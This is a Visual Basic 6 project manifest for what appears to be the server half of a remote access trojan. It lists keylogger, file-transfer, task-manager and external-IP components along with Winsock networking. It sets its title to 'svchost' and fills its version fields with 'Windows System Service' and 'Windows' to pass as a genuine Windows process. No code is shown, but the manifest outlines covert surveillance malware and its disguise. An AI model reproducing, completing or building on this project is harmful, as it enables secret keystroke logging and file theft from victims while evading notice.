Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\Windows\system32\stdole2.tlb#OLE Automation
Reference=*\G{C866CA3A-32F7-11D2-9602-00C04F8EE628}#5.4#0#..\..\..\..\Windows\System32\Speech\Common\sapi.dll#Microsoft Speech Object Library
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; mswinsck.ocx
Object={48E59290-9880-11CF-9754-00AA00C00908}#1.0#0; MSINET.OCX
Form=server.frm
Form=server_2.frm
Module=ModIP; External IP\Modules\ModIP.bas
Form=External IP\Forms\frmMain.frm
Form=server_3.frm
Form=server_4.frm
Form=server_keyloger.frm
Form=server_file_transferr.frm
Form=server_5.frm
Form=server_6.frm
Form=server_7.frm
Reference=*\G{6B263850-900B-11D0-9484-00A0C91110ED}#1.0#0#..\..\..\..\Windows\system32\msstdfmt.dll#Microsoft Data Formatting Object Library 6.0 (SP6)
Form=..\Görev Yöneticisi\server_gorev_yoneticisi.frm
Form=server_8.frm
Object={6BF52A50-394A-11D3-B153-00C04F79FAA6}#1.0#0; wmp.dll
IconForm="Form1"
Startup="Form1"
HelpFile=""
Title="svchost"
ExeName32="server.exe"
Command32=""
Name="Server"
HelpContextID="0"
Description="Windows System Service"
CompatibleMode="0"
MajorVer=1
MinorVer=3
RevisionVer=8
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="Windows System Service"
VersionCompanyName="Windows"
VersionFileDescription="Windows System Service"
VersionProductName="Windows System Service"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=-1
CodeViewDebugInfo=-1
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0
